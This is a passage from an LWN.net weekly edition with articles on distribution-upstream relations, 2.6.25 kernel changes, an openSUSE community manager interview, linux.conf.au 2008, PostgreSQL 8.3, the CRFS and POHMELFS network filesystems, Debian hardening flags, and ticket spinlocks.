Shuttleworth fresh from a visit to Antarctica.  Mark's pitch, says Jeff,
"sounded like crack" at the time.  By 2003 or so, it just didn't seem like
there was a whole lot of room for a new distribution.  But Mark had some
interesting ideas, and Jeff signed on; the result, of course, was Ubuntu.


Ubuntu has clearly had some success, but, in some important ways, it has
failed to work out - at least for Jeff.  He found himself distracted by Ubuntu's lack of
participation in Debian, from which it derived its product.  There was
a real tension between tracking Debian and tracking upstream projects
more directly.  Despite Jeff's insistence that Ubuntu should be tracking
(and pushing updates into) Debian's unstable distribution, Ubuntu often
chose to go with upstream, resulting in what is, in effect, a fork of the
Debian distribution - in terms of both the technology and the community.


What Ubuntu was doing was taking upstream packages, modifying them,
bringing in shiny new features, and generally looking for ways to
differentiate itself from the other distributors.  So, for example, the
first Ubuntu release contained a great deal of Project Utopia work (aimed
at making hardware "just work" with Linux) which had been done by
developers from other distributions; Ubuntu shipped it first, though, and
got a lot of credit for it.  Novell's behind-closed-doors development of
Xgl was motivated primarily by the wish to keep Ubuntu from shipping it
first.  Meanwhile, Red Hat had slowly learned that trying to differentiate
itself by diverging from upstream was a path to pain.  So Red Hat's
developers created AIGLX,
in an open, community oriented manner; the result is that AIGLX has proved
to be the winning technology.


Events like these led Jeff to wonder about just where the integration
of packages should be done - upstream or downstream?  From Jeff's
(GNOME-based) upstream point of view, he wonders why he doesn't have a
direct relationship with his users.  While most projects deliver their code
through middlemen (distributors), there is an example of a project which
has managed to maintain a much more direct relationship: Firefox.  Most
Firefox users are direct clients of the project - though most of them are
Windows users.  The Firefox trademark has been used to ensure that, even
when distributors are involved, the upstream developers get a say in what
is delivered to users.


So, what happens if you take out the middleman?  It's instructive to look
back at what life was like before there were distributors.  It was, Jeff
says, much like pigs playing in mud; perhaps they enjoyed it, but it was
messy.  There are, in fact, a lot of good things that distributors have
done for us.  You can get a fully integrated stack of software from one
source, and the distributor acts, in a way, as the user's advocate toward
the upstream project.  We don't want to lose out on all that.


But, if one were to look at facilitating a more direct relationship between
development project and their users, one would want to take advantage of a
number of maturing technologies.  These include:


 OpenID.  Any process of distributing distributions must look at
     distributed identity, and OpenID is the way to do it.

 DOAP.  "Sounds terrible" but it's a useful way of describing a project
     with XML.  With a DOAP description, a user can find a project's
     mailing lists, bug tracker, source repository, etc.

 Atom.  This is how projects can distribute information about what they
     are doing.

 XMPP.  This is a Jabber-based message queueing and presence protocol.
     It can be used to more active publishing of information than Atom can
     do.

 Distributed revision control.  Lots of functionality for integration
     between projects, and between upstream and downstream.  Jeff sees git
     as a step backward, though; some
     of the other offerings, he thinks, have much better user interfaces.


Also important are the packaging efforts which are underway in a
number of places.  These include Fedora, which is "becoming competitive
with Debian" as a community project.  OpenSUSE has put together a build
system which can create packages for a number of distributions.  Debian has
had a community build system for years; there is interest in Debian in
going the next step, though - ideas like building packages directly from a
distributed version control system.  Ubuntu's Launchpad was "a spectacular
vision," though the reality is "a bit of a snore"; it didn't achieve its
goal of helping upstream and downstream work together.


Then there's Bugzilla, which is the "bug filing gauntlet" between projects
and their users.  The Debian bug tracking system has done a better job of
facilitating bug reports by
allowing them to be submitted by email.  But most big projects are
using Bugzilla.  It would be much improved by using OpenID (so that users
would not have to register to file bugs) and some sort of Atom-based feed
which would make querying bugs easy.


If you take out the distribution, what do you replace it with?  How do we
achieve consistency?  We need to create standards for how we interact with
each other.  And we can, in fact, be very good at consistency and standards
when the need 
is clear.  Good release management is a step toward that goal.  GNOME once
had very bad release management, but has pulled it together.  Doing
time-based releases was a hard sell, but few developers would want anything
else now.  Now GNOME release management just works.


Consistency in source management is needed.  Once upon a time that was done
through CVS, but CVS is no longer up to the job, and now every project is using
a different distributed version control system.  But, sooner or later, one
of the competing projects will win out and "hopefully we'll have clarity
again."  Autotools and pkgconfig can also go a long way toward creating
consistency between projects.


So, if we can push the available tools up into the upstream projects, those
projects can get better at producing packages for distributions themselves.
Once the tools (like bug trackers) can talk to each other, people will
start making more use of them and network effects will take over.  But, at
the moment, the knowledge about integration remains at the distribution
level.  

Debian, Jeff thinks, is well placed to take on a project like this
and push its integration knowledge upstream.  While Debian has typically
been ten years ahead of everybody else in its packaging and integration
abilities, it currently has a "relevancy problem."  Finding ways to help
upstream projects support their users more directly while maintaining
overall integration and consistency would be a perfect way for Debian to
maintain its leadership in this area.  That could change the game
for everybody, bringing projects closer to their users and making us all
"happy as pigs in mud."

		More stuff for 2.6.25


Since last week's
installment, some 3800 changesets have been merged into the mainline
git repository.  Some of the more interesting user-visible changes found in
that patch stream include:


 Support for new hardware, including RDC R-321x system-on-chip
     processors, Onkyo SE-90PCI and SE-200PCI sound devices, Xilinx ML403
     AC97 controllers, TI TLV320AIC3X audio codecs, Realtek
     ALC889/ALC267/ALC269 codecs, VIA VT1708B HD audio codecs, SiS 7019
     Audio Accelerator devices, C-Media 8788 (Oxygen) audio chipsets, Asus
     AV200-based sound cards, Freescale MPC8610 audio devices, Audiotrak
     Prodigy 7.1 HiFi audio devices, Conexant 5051 audio codecs,
     MediaTek/TempoTec HiFier Fantasia sound cards, wireless RNDIS devices
     (and Broadcom 4320-based devices in particular), USB printer gadgets
     (intended for use in printer firmware), 
     and NetEffect 1/10Gb ethernet adapters.

 The nearly-unused ALSA sequencer instrument layer has been removed.

 SELinux has a new set of checks which allow the creation of policies
     which control the flow of packets into and out of the system.

 Netfilter has a more flexible "hashlimit" mechanism for limiting the
     number of packets to/from a given source over time.

 There is a new "flow" classifier for the network fair queueing code
     which allows the more flexible creation of traffic policies.

 The futex mechanism has a new "bitset wait" mechanism which allows for
     more targeted wakeups.  This feature will be used by glibc to
     implement optimized reader-writer locks.

 PCI hotplug is no longer an experimental feature.

 Support for PCI Express ASPM, a power management protocol, has been
     added.  

 The virtio "balloon" driver (which can be used to change the amount of
     memory used by a KVM guest) and PCI driver have been added.

 The CLONE_STOPPED bit (for the clone() system call)
     is said to be unused and is planned for removal.  For 2.6.25, a
     warning will be printed.

 The timerfd() system call is back, with a reworked, more capable
     API. 

 The page map patches,
     which enable much better accounting of memory use by processes, have
     been merged.

 The "PM QOS" infrastructure allows both kernel and user-space code to
     register quality-of-service requirements (in the form of CPU DMA
     latency, network latency, and network throughput).  These requirements
     will be taken into account when the kernel considers putting the
     system into a lower-power state.

 Per-process capability bounding sets (which permanently remove
     potential capabilities from a process) are now supported.  64-bit
     capability mask support has also been merged.

 The simplified mandatory
     access control kernel (SMACK) security module has been merged.

 The smbfs filesystem has (finally) been deprecated in favor of CIFS.
     It is now scheduled for removal in 2.6.27.

 There is a new RPC transport module allowing (client) NFS mounts using
     RDMA.


Changes visible to kernel developers include: 


 A large number of SUNRPC symbols (rpc_* and
     rpcauth_*) have been changed to GPL-only exports.

 The x86 architecture merger continues, with quite a few files being
     coalesced.

 The "flatmem" and "discontigmem" memory models have been removed on
     the 64-bit x86 architecture; "sparsemem" is now used for all builds.

 The x86 spinlock implementation has been replaced with a "ticket
     spinlock" mechanism which provides fair FIFO behavior.  

 The fastcall function attribute didn't do anything on the x86
     architecture, so it has been removed.

 x86 has a new set of functions for easily manipulating page
     attributes.  They are:


     There is also a set of set_pages_* functions which take a
     struct page pointer rather than a beginning address.

 Early-boot debugging of x86 systems via the FireWire port is now
     supported. 

 Bidirectional command support has been added to the SCSI layer.

 There is a new process state called TASK_KILLABLE.  It is a
     blocked state similar to TASK_UNINTERRUPTIBLE, with the
     difference that a wakeup will happen upon delivery of a fatal signal.
     The idea is to allow (almost) uninterruptible sleeps, but to still
     allow the process to be killed outright - thus ending the problem of
     unkillable processes stuck in the "D" state.  There is a new set of
     functions for using this state: wait_event_killable(),
     schedule_timeout_killable(), mutex_lock_killable(),
     etc. 

 add_disk_randomness() has been unexported as there are no
     more in-tree users.

 pci_enable_device_bars() has been replaced by two
     more-specific functions: pci_enable_device_io() and
     pci_enable_device_mem(). 

 The high-resolution timer API has been augmented with:


     It will move the given timer's expiration forward past the current
     time as determined by the associated clock.

 The device structure now holds a pointer to a
     device_dma_parameters structure:


     These parameters are used by the DMA mapping layer (and the IOMMU
     mapping code in particular) to ensure that I/O operations are set up
     within the device's constraints.  The PCI layer supports this feature
     with two new functions:


     Drivers for devices with unusually strict DMA limitations should
     probably use these functions to ensure that those restrictions are
     respected. 


One thing which has not made it into 2.6.25 is the KGDB debugger for
the x86 architecture.  Amusingly, a linux.conf.au kernel mini-conf
discussion of "sneaking" KGDB past Linus proceeded for some time before the
participants noticed him standing in the back of the room listening to the
whole thing.  His current position is that
he won't pull it as part of 
the x86 tree, and he's still not much interested in the idea in general.


As of this writing, the merge window is still open and could stay that way
for as much as a week.  So more interesting code could still find its way
in through this merge window; stay tuned.

		An interview with the new openSUSE community manager


Joe 'Zonker' Brockmeier has joined the openSUSE
project as the openSUSE community manager.  We were pleased to have the
opportunity to ask Zonker a few questions about his new job.

Many LWN readers will remember that you were a regular contributor to LWN.
Any comments on what you have been up to between there and here?


Sure -- I stopped contributing to LWN when I took a full-time job with
OSTG/Linux.com (now the company known as SourceForge), and had to stop
freelancing. I was editorial director there for two years, and then
joined Linux Magazine as Editor-in-Chief. I've missed contributing to
LWN, but I still read LWN religiously.


As community manager will you be employed by Novell?


Yes.


Will you report to the openSUSE board?


I will be working with the board, but I report to Justin Steinman at
Novell. It's an unusual position, though, because my job is in large
part to be an advocate/ombudsman for the community.


openSUSE has adopted a Code of Conduct for
mailing lists and IRC.  As community manager, will policing this traffic be
a part of your job?


No -- we don't plan to have anyone actively policing the lists looking
for violations. Instead, the board is working on a policy to allow
community members to bring violations of the Code to the board to
decide whether disciplinary action should be needed. I hope that it's
something that won't be needed often, or at all -- and I don't think
it will be needed often.


How much control does Novell hold over openSUSE development?  Should there
be more or less control?  Is Novell allowing the community to make its own
decisions?


Right now, I'd say Novell is still guiding development pretty closely,
but would like the community to have a more prominent voice in the
direction of the development of openSUSE. I think the Fedora Project
is a pretty good model here, and I really think Max Spevack did a
great job in terms of helping Fedora come into its own.

The openSUSE Board appointed
last November is a step towards giving the community more control over
governance of the project.


This is a new position.  How much latitude will you have to define what the
community manager is/does?


Well, certain aspects of the job are already well-defined. For
example, a big part of the job will be traveling to conferences to
speak about openSUSE and also to organize an openSUSE conference. But
there's definitely some room to define the role as well.


OpenSUSE has a weekly news letter which has come out almost weekly since
its inception last November.  Do you have any plans to get involved with
that?  Is it useful?


Yes, I do plan to contribute and help out with that where needed. I
think it's very useful -- communication is vital to the health of a
project like openSUSE. There are a lot of people contributing to
openSUSE, and without something like the weekly news, it would be easy
for contributors to lose track of what their colleagues are doing.
It's also important to spreading the news outside of the openSUSE
community so that other open source projects know what we're up to and
possibly find ways to collaborate and help reduce duplication of
effort between projects. Finally, I think it's a good way to show what
various contributors are doing and help recognize the contributors
that are having an impact on openSUSE.


What are your plans for the openSUSE community?


Over the long term, I'd like to help foster increased adoption of
openSUSE by a significant amount -- which means doing a better job of
promoting the distro, as well as communicating with potential users
and finding out what it is they need/want from openSUSE and working on
delivering that. (I'd encourage LWN readers to check out the alpha
builds for openSUSE 11.0 and give us feedback as we're working on the
final 11.0 release that should be done in July.)

I also want to work on developing a recognition system so that
contributors are acknowledged for their work, which we're doing more
on already -- we just announced our membership program for
contributors to be recognized.  I also want to make sure we're providing a
"roadmap" so that potential contributors have a clear path into the project
and know where to get started -- whether that's development, artwork,
documentation, quality assurance, advocating openSUSE, or supporting other
users.

Also, organize the first openSUSE conference, make sure openSUSE is
better represented at other conferences, and help provide potential
contributors with a roadmap to becoming contributors. I'd like to make
it as easy as possible for people to participate.

Finally, but not least -- I want to do what I can to help coordinate
increased cooperation between Linux distros and reduce duplication of
effort. While a lot of folks might like to portray the situation as
openSUSE vs. Fedora, Ubuntu, or any other distro, I don't see it that
way -- if someone is already happily using another distro, then I
consider that a win. I want to focus on attracting people who aren't
running Linux at all yet. There's plenty of work left to do, and I
hope we can do a better job of pooling our resources to attract those
people.


Is there anything you would like to add?


Just that I'd like to encourage LWN readers to visit
zonker.opensuse.org and news.opensuse.org for updates on the openSUSE
project, and to feel free to contact me (zonker@opensuse.org) with any
questions, suggestions, and comments related to openSUSE.


Thank you for taking the time to answer our questions.

		linux.conf.au 2008


linux.conf.au has an interesting structure which differentiates it from
most other events.  Every year, a completely new set of organizers takes
over the event, moves it to a new city, and puts its own stamp on it.
They have a great deal of freedom in how they run LCA, but there is still a
group of Linux Australia members and past organizers who keep an eye on
things and help ensure that the event does not run into problems.  The
result is a conference which has a lot of fresh energy every year, but
which is also reliably interesting.  Many attendees consider it to be one
of the best Linux events to be found anywhere in the world.


This year, LCA was held in Melbourne, Australia; the organizing team was
led by Donna Benjamin.  The now-familiar LCA formula was followed, but with
some small changes.  The tutorial day is no more, replaced by relatively
short tutorial sessions on each day.  The traditional auction for charity
was also gone this year; instead, a raffle (with Greg Kroah-Hartman's 2.6.22 contributor poster as the
main prize) yielded some $1000 for a local penguin refuge.  The raffle was


certainly a lower-pressure, less alcohol-fueled way of raising money, but
LCA without Rusty Russell as auctioneer just isn't quite the same.  That
quibble notwithstanding, LCA 2008 was an interesting, well-organized, and
well-attended event.  Ms. Benjamin and company have certainly upheld the
standards for this conference.


A number of LCA talks have been covered in separate LWN articles, and a few
more may yet follow.  This article will quickly review a few other high
points, as seen from your editor's perspective.  It's worth noting that
videos for almost all of the talks have been posted on the conference web
site.


Certainly one high point came on January 30, the day that LWN
celebrated its tenth anniversary.  The crowd sang a rousing - if not
entirely harmonious - version of "happy birthday" after Bruce Schneier's
keynote.  The following morning tea featured special LWN muffins; they
were, much to your editor's delight, of the intense chocolate variety.  It
is hard to imagine a better place or time to celebrate to celebrate ten years of
LWN.


While most LCA presentations are quite technical in nature, there are
exceptions.  Australian lawyer Kimberlee Weatherall's talk on legal issues
was called "Stop in the name of law"; it covered a number of topics of
interest to a global audience.  Kimberlee, it's worth noting, was the
recipient of the "Rusty Wrench" award for service to the free software
community at last year's LCA in Sydney.


The Digital Millennium Copyright Act, she noted, is ten years old now.  At
this point, the debate on its anti-circumvention provisions is essentially
done, and anti-circumvention has won; she is not expecting to see any major
changes in countries which have adopted such laws.  The music industry may


be moving away from use of DRM, but "they were never very good at it
anyway."  DRM is still going strong in other areas, such as movies and
subscription television.


Similarly, the fight to end software patents is over, and we have lost.
There are incredible numbers of software patents issued every year; every
one of those patents represents a significant investment by its owner.  The
total amount of investment in these patents is huge; that amount of money
is almost impossible to displace.  It is also very hard to define what a
software patent really is; there are thousands of them in Europe, which
ostensibly does not allow software patents.  No matter how the rules are
written, lawyers will find a way around them.


What is happening on the patent front, instead, is a more constructive
engagement with the process.  Some reform is happening in the US, as a
result of the KSR decision and various attempts to mitigate the costs
associated with patents.  So the situation might improve slowly over time.


GPLv3 is out.  It now has to pass two tests: the market test (will projects
use it?) and any legal tests which might be brought.  Kimberlee expressed
some doubts on whether GPLv3 will really hold up in court, but did not
elaborate on them.


There is a new threat out there which we should not underestimate: the push
to force copyright enforcement duties onto ISPs.  This effort takes two
forms: getting "infringers" disconnected, and requiring ISPs to filter data
passing through their networks.  There are a lot of problems with either
approach, but that is not stopping the industry (and others, such as
anti-porn crusaders) from pushing hard for ISP responsibility.  This is a
fight to watch.


So what should the free software community do?  Not much, says Kimberlee,
except to keep coding.  The production of good code brings us allies with
money, and that's what we're going to need.  As long as we are successful,
people will go out of our way to protect us.  Keep doing what we do, and
things should come out OK.


Anthony Baxter is the Python release manager; he was also the keynote
speaker for the third day of the conference.  He is, to say the least, an
entertaining speaker, so this would be a good one to watch on video.  The


talk was about coming changes in Python, and Python 3.0 in
particular.  The 3.0 release, he says, is "the one where we break all of
your code."  It's the first backward-incompatible update of the language
(at least, if you don't deal in C extension modules).


There are a lot of changes to the language which your editor will not
repeat here; they are well documented on the Python web sites.  As noted,
many of these changes will cause existing code to break.  This is being
done, says Anthony, because the Python language is now 16 years old.  Like
all 16-year-olds, it has a number of annoying features.  It's time to clean
out a lot of accumulated cruft and get back to the minimal, "there is one
way to do it" vision that has always driven the language.


Perhaps what's most interesting is what won't be done.  The language
will not be bloated - it will stay Python.  There will be no braces; white
space will still be used to mark blocks of code.  The much-criticized
global interpreter lock will remain.  And, importantly, this will be an
incremental (if big) update - there will be no overall rewrite of the
interpreter.  The experience of certain other projects (being Perl 6
and Mozilla) shows that total rewrites tend to be much longer, more painful
affairs than anybody might envision at the outset.


There will be migration tools, of course, and warnings built into the
forthcoming 2.6 release which will point out things that may cause
migration difficulties.  The 2.x series will be supported for some years
into the future.  And, says Anthony, there will be no Python 4.0 release.
This is their one chance to break everything and start over, and they plan
to get it right this time.


Dave Jones is the head maintainer for the Fedora kernel.  At LCA 2008 he
took a break from pointing out user-space problems and talked about "a day


in the life of a distribution kernel maintainer."  The real subject of the
talk was the process that the Fedora project goes through to put together
the kernels they ship.


There are currently three developers working on the Fedora kernel (Dave,
Chuck Ebbert, and Kyle McMartin), and "several dozen" working on the
RHEL kernels.  Most of the RHEL folks are doing backports of fixes,
drivers, etc. to the older kernels used by RHEL releases.


Once a kernel has been chosen for release, it's time to start adding
patches.  Some interesting numbers were put up at this point.  Red Hat
Linux 7 had 70 patches added to its 2.2.24 kernel.  That number went
slowly up, to the point where Fedora Core 6 had 191 patches.  There
are currently 63 patches added to the Fedora 8 kernel, though that may
grow over the life of this release.  By comparison, RHEL 5 is shipping
a 2.6.18 kernel with 1628 patches added to it - a very different world.


There's all kinds of patches which go into a distributor kernel.  These
include security technologies (ExecShield) which have not made it into the
mainline, changes to some default parameters, the silencing of certain
"scary messages" which tend to provoke lots of needless bug reports,
out-of-tree drivers, patches which help debug problems found in the field,
stuff which has been vetoed upstream, and more.  Then it's a matter of
putting the package and dealing with the subsequent bug reports - lots of
them.


The closing ceremony included the traditional introduction of the organizer
for next year's event.  This event will go, for the first time ever, to
Hobart, Tasmania; see MarchSouth.org
for more information.  There is some information on what this team is
planning in the bid
document [1.6MB PDF]; your editor is intrigued by the following:
"The official Speakers' Dinner will be held at a mystery location
south of Hobart following a 40 minute river cruise on a high speed luxury
catamaran."  It's never too soon to get that talk proposal
together.


Finally, the last few LCA events have included the passing of the "Rusty
Wrench" award to somebody who has performed a great service to the
community.  Recipients so far are Rusty Russell (after whom the award is
named), Pia Waugh, and Kimberlee Weatherall.  The Rusty Wrench was not
awarded at LCA2008, though.  It seems that, in the future,
the Rusty Wrench will be part of an extensive set of awards which will be
handed out at a separate "gala dinner" event held in the (Australian)
winter.  The awarding of the Rusty Wrench was a nice LCA feature which will
be missed, but, then, there are advantages to having another excuse to
visit Australia.

		PostgreSQL releases version 8.3


Version 8.3 of the
PostgreSQL DBMS was
announced on February 4, 2008:
"Today the PostgreSQL Global Development Group releases the long-awaited
version 8.3 of the most advanced open source database, which cements our
place as the best performing open source database."


Version 8.3 brings many new
features.
First on the list is the cleaning up of data type conversions.
This improvement may impact backwards compatibility issues with older
applications, but will insure better data integrity in the future.


There are four new capabilities that aim to improve the consistency of
response times, these include Heap Only Tuple for speeding up access to
frequently updated data, asynchronous commits,
spread checkpoint autotuning and a just-in-time background writing strategy.
There have been numerous speed improvements including better recovery time
for the write ahead log, faster small-merge joins, faster LIKE/ILIKE
comparisons, improvements to searches using LIMIT, lazy XID assignment for
improving read-mostly database speed and function costing for faster query
planning.

<!-- LWNPutAdHere -->

Large database support improvements include synchronized scans for
multiple users, level 2 cache scan protection to prevent CPU thrashing
and reductions in the size of headers for variable size fields.
Windows users will benefit from new Visual C++ support and some code rewrites.


Administration improvements include output of logs to database-loadable
files, SSPI and GSSAPI support for Kerberos authentication, embeddable
GUC settings at function creation time, parallel autovacuum workers,
the pg_standby tool for configuring warm standby servers and a new ability
to specify the position of NULLs at the beginning or end of results.


Development improvements include API improvements to the full text search tool,
plan invalidation for clearing cached plans and automatically dropping
plans when tables are updated, and updatable cursors.


Data type enhancements include full support for the ANSI SQL:2003 XML spec,
support for 128 bit UUIDs, support for arrays of compound types and
support for ENUM columns with a defined ordered list of alternatives.
The ENUM enhancement allows applications to be migrated from the
MySQL DBMS.


The PostgreSQL stored procedure language has a simplified syntax for row-returning functions and new support for scrollable cursors, which
allows procedures to perform complex row manipulations.


A number of new accessory tools are being released with PostgreSQL 8.3
including a multi-threaded connection pooler, a distributed, horizontally scaled table interface, an SNMP interface, a SELinux-based security extension,
a new GUI with debugging and step-through execution capabilities, a
new replicated query agent, a multi-master asynchronous replication system,
an integrated clustering tools project and an improved replication system.


For more information on the new features in PostgreSQL 8.3, see the

release notes.
The
feature matrix
gives a tabular view of features added versus the version number.


In order to speed the next release up, the PostgreSQL team plans to
implement a new
development plan
for version 8.4:


In the 8.4 development cycle we would like to try a new style of
development, designed to keep the patch queue to a limited size and to
provide timely feedback to developers on the work they submit. To do
this we will replace the traditional 'feature freeze' with a series of
'commit fests' throughout the development cycle. The idea of commit
fests was discussed last October in -hackers, and it seemed to meet
with general approval. Whenever a commit fest is in progress, the
focus will shift from development to review, feedback and commit of
patches. Each fest will continue until all patches in the queue have
either been committed to the CVS repository, returned to the author
for additional work, or rejected outright, and until that has
happened, no new patches will be considered.


Version 8.3 represents a major step forward for PostgreSQL,
if the new development style bears fruit, the next major version
will come about more quickly.


		CRFS and POHMELFS


 Performance, or lack thereof, has often been a knock against the
venerable Network File System (NFS), but no real competition has emerged.
NFS also has some serious flaws for programmers and users, with behavior
that is markedly different from that of local filesystems.  Both of these
problems are spurring the creation of new network filesystems; two of
which were announced in the last week.  

The Coherent Remote File System (CRFS) was introduced last week at
linux.conf.au by Zach Brown of Oracle.  It uses BTRFS—pronounced
"butter-f-s"—as its storage on the server, rather than layering atop
any POSIX filesystem as NFS does.  According to Brown, BTRFS has a number
of important features that outweigh the inconvenience for users of getting
their data into a BTRFS volume.  The biggest is the ability to do compound
operations (creating or unlinking a file for example) in an atomic and
idempotent manner.


CRFS has a userspace daemon (crfsd) that talks to the BTRFS volume as well
as multiple clients.  The clients use the kernel VFS caching infrastructure
extensively, thus are implemented as kernel modules.  A user wishing
to access the underlying BTRFS volume on the server, must mount it as a
CRFS volume; crfsd must have exclusive access to the BTRFS.  This is also
different from NFS which will cooperate with local mounts of the underlying
filesystem. 


The basic idea behind CRFS is to have clients cache as much of the
filesystem data as they can while using cache coherency protocols to reduce
the amount of network traffic that gets generated.  Clients
keep track of the cache state for each object they have stored, while the
server tracks the cache state of all objects that any client has.  The
messages between server and client consist of cache state transitions and
the data being transferred.


Data transfer in both directions is done using CRFS "item ranges".  CRFS
objects use the BTRFS key scheme to represent objects (file data, directories,
directory entries, inodes, etc.) in the filesystem.
An item range is a contiguous section of the key space, specified by a
minimum and maximum key value as part of the message.  When the client is
filling its cache, it can request a particular key but also offer to take
other surrounding keys as part of the response; if the server sees those
keys in the BTRFS leaf node, it can send them along as well.

 Something on the order of a 3x speedup over asynchronous NFS mounts is
the current performance of CRFS for a simple untar.  Comparing to
synchronous NFS mounts (where each write has to actually hit the remote
disk) is not a sensible comparison; there is a roughly 10x speed difference
between the two types of NFS mounts.  Brown has been working on CRFS for
"about a year" and is planning to release the code eventually.  Until that
happens, the slides
[PDF] and video
[Theora] from his talk—as well as a few postings to his weblog—are the only
sources of information about CRFS.  

Another filesystem, that aims to have a broader reach than
CRFS, is the Parallel Optimized Host Message Exchange
Layered File System (POHMELFS), announced in linux-kernel posting by
Evgeniy Polyakov.  POHMELFS is meant to be a building block for a
distributed filesystem that would offer a multi-server architecture and
allow for disconnected filesystem operations.  Polyakov has only been
working on it for a month, so it is, at best, the start of a proof of concept. 


The POHMELFS vision is in some ways similar to CRFS in that the clients
will handle as much as possible locally, with minimal server interaction.
Like CRFS, client kernel modules talk to a server userspace daemon, using
cache coherency protocols to keep the data and metadata in sync.  For CRFS,
the coherency is not yet implemented, but is fleshed out to some
 extent,
while POHMELFS has quite a bit of fleshing out to do.  Unlike CRFS,
POHMELFS supports POSIX filesystems on the server side and the code is
available now.


There are some rather large hurdles to overcome in the POHMELFS vision, not
least of which is handling file IDs in separate client-side filesystems such
that they can be synchronized with the server.  The current code implements
a write-through cache version that creates objects on the server before
they are
used in the client side cache.  There is also an additional patch that
implements a hack to disable the
writeback cache and use only the client side caching.  The latter is, not
surprisingly, very fast, but not terribly usable for multiple mounts of the
filesystem.   Essentially Polyakov is showing the benefits of client-side
caching, but in the context of a broader scheme.


It will be a long time, if ever, that we see some descendant of either of
these filesystems in the kernel.  There is much work to be done, but they
are worth looking at to see where networking and distributed filesystems may be
headed.  For them to be useful outside of just
the Linux world—like the ubiquity of NFS—there would have to be some kind of standardization
followed by adoption by the major players.  That will take a very long time.


		Security hardening for Debian


Making the programs in a distribution more resistant to exploits—a
process known as hardening—is a fairly common way to reduce the
attack surface for the distribution.  Many distributions have made
an effort in this area, with some adding in an overall security architecture, like
AppArmor for SUSE or SELinux for Red Hat and Fedora distributions.
Debian is currently looking at enabling some hardening features,
potentially throughout a large swath of packages that it distributes.  The
features being considered and the concerns raised provide an interesting
look at the tradeoffs.


A posting to
debian-devel-announce regarding hardening features for Lenny started
the conversation.  Those packages that are most susceptible—network services, packages that parse files from
untrusted sources, or those that have been the subject of a security
alert—should enable a set of security tools that will help deflect
attacks against them.  Various attacks rely upon certain characteristics of
Linux binaries that allow them to be exploited.  By altering the way the
binaries are built, those particular threats can be mitigated. 


The experimental hardening-wrapper
package makes enabling the various toolchain differences as easy as setting
DEB_BUILD_HARDENING=1 in the environment.  This will change
gcc, g++, and ld to use the desired flags when
building packages.  Each hardening feature can also be disabled separately
by setting DEB_BUILD_HARDENING_xyzzy=0 (where xyzzy is the name of
a hardening feature) if they cause build or
performance problems for a particular package. 


The specific features enabled are described in the original posting as well
as with more detail on the Debian wiki entry for
Hardening.  They are:

using -Wformat to catch printf() family calls that do
not have a string literal for the format string which can lead to problems
if the argument came from an untrusted source and contains format specifiers.
using -D_FORTIFY_SOURCE_ to validate glibc calls such as
strcpy() when the buffer sizes are known at compile time, which
can help stop buffer overflow attacks.
using -fstack-protector to thwart most stack smashing attacks.
creating Position Independent Executables (PIE) which facilitates using
the Address Space Layout Randomization that is available in some kernels.
This makes it difficult for an attacker to have any knowledge of what the
addresses for the program's sections will look like.
using ld -z relro to change certain sections to be read-only
once ld has made its modifications while loading the program.  This can
thwart attacks that try to overwrite the Global Offset Table (GOT).


Many other distributions have already been down this path: Gentoo
has a page describing their hardened toolchain, Mark Cox of Red Hat has
a detailed look
at the evolution of security features in Red Hat and Fedora releases,
OpenSUSE has a page
about its security features, and so on.  There is a price to be paid in
binary size, execution speed, and cache behavior for these techniques, but
for most environments, where resources are not massively constrained, the
cost is worth it.  It makes new attacks against those systems more
difficult to design, which will make users and administrators sleep a
little better at night.


		Ticket spinlocks


Spinlocks are the lowest-level mutual exclusion mechanism in the Linux
kernel.  As such, they have a great deal of influence over the safety and
performance of the kernel, so it is not surprising that a great deal of
optimization effort has gone into the various (architecture-specific)
spinlock implementations.  That does not mean that all of the work has been
done, though; a patch merged for 2.6.25 shows that there is always more
which can be done.


On the x86 architecture, in the 2.6.24 kernel, a spinlock is represented by
an integer value.  A value of one indicates that the lock is available.  
The spin_lock() code works by decrementing the value (in a
system-wide atomic manner), then looking to see whether the result is
zero; if so, the lock has been successfully obtained.  Should, instead, the
result of the decrement option be negative, the spin_lock() code
knows that the lock is owned by somebody else.  So it busy-waits ("spins")
in a tight loop until the value of the lock becomes positive; then it goes
back to the beginning and tries again.

Once the critical section has been executed, the owner of the lock releases
it by setting it to 1.

This implementation is very fast, especially in the uncontended case (which
is how things should be most of the time).  It also makes it easy to see
how bad the contention for a lock is - the more negative the value of the
lock gets, the more processors are trying to acquire it.  But there is one
shortcoming with this approach: it is unfair.  Once the lock is released,
the first processor which is able to decrement it will be the new owner.
There is no way to ensure that the processor which has been waiting the
longest gets the lock first; in fact, the processor which just released the
lock may, by virtue of owning that cache line, have an advantage should it
decide to reacquire the lock quickly.


One would hope that spinlock unfairness would not be a problem; usually, if
there is serious contention for locks, that contention is a performance
issue even before fairness is taken into account.  Nick Piggin recently
revisited this issue, though, after noticing:


	On an 8 core (2 socket) Opteron, spinlock unfairness is extremely
    	noticable, with a userspace test having a difference of up to 2x
    	runtime per thread, and some threads are starved or "unfairly"
    	granted the lock up to 1 000 000 (!)  times.


This sort of runtime difference is certainly undesirable.  But lock
unfairness can also create latency issues; it is hard to give latency
guarantees when the wait time for a spinlock can be arbitrarily long.


Nick's response
was a new spinlock implementation which he calls "ticket 
spinlocks."  Under the initial version of this patch, a spinlock became a
16-bit quantity, split into two bytes:


Each byte can be thought of as a ticket number.  If you have ever been to a
store where customers take paper tickets to ensure that they are served in
the order of arrival, you can think of the "next" field as being the number
on the next ticket in the dispenser, while "owner" is the number appearing
in the "now serving" display over the counter.

So, in the new scheme, the value of a lock is initialized (both fields) to
zero.  spin_lock() starts by noting the value of the lock, then
incrementing the "next" field - all in a single, atomic operation.  If the
value of "next" (before the increment) is equal to "owner," the lock has
been obtained and work can continue.  Otherwise the processor will spin,
waiting until "owner" is incremented to the right value.  In this scheme,
releasing a lock is a simple matter of incrementing "owner."


The implementation described above does have one small disadvantage in that
it limits the number of processors to 256 - any more than that, and a
heavily-contended lock could lead to multiple processors thinking they had
the same ticket number.  Needless to say, the resulting potential for
mayhem is not something which can be tolerated.  But the 256-processor
limit is an unwelcome constraint for those working on large systems, which
already have rather more processors than that.  So the add-on "big
ticket" patch - also merged for 2.6.25 - uses 16-bit values when the
configured maximum number of processors exceeds 256.  That raises the
maximum system size to 65536 processors - who could ever want more than
that?


With the older spinlock implementation, all processors contending for a
lock fought to see who could grab it first.  Now they wait nicely in line
and grab the lock in the order of arrival.  Multi-thread run times even
out, and maximum latencies are reduced (and, more to the point, made
deterministic).  There is a slight cost to the new implementation, says
Nick, but that gets very small on contemporary processors and is
essentially zero relative to the cost of a cache miss - which is a common
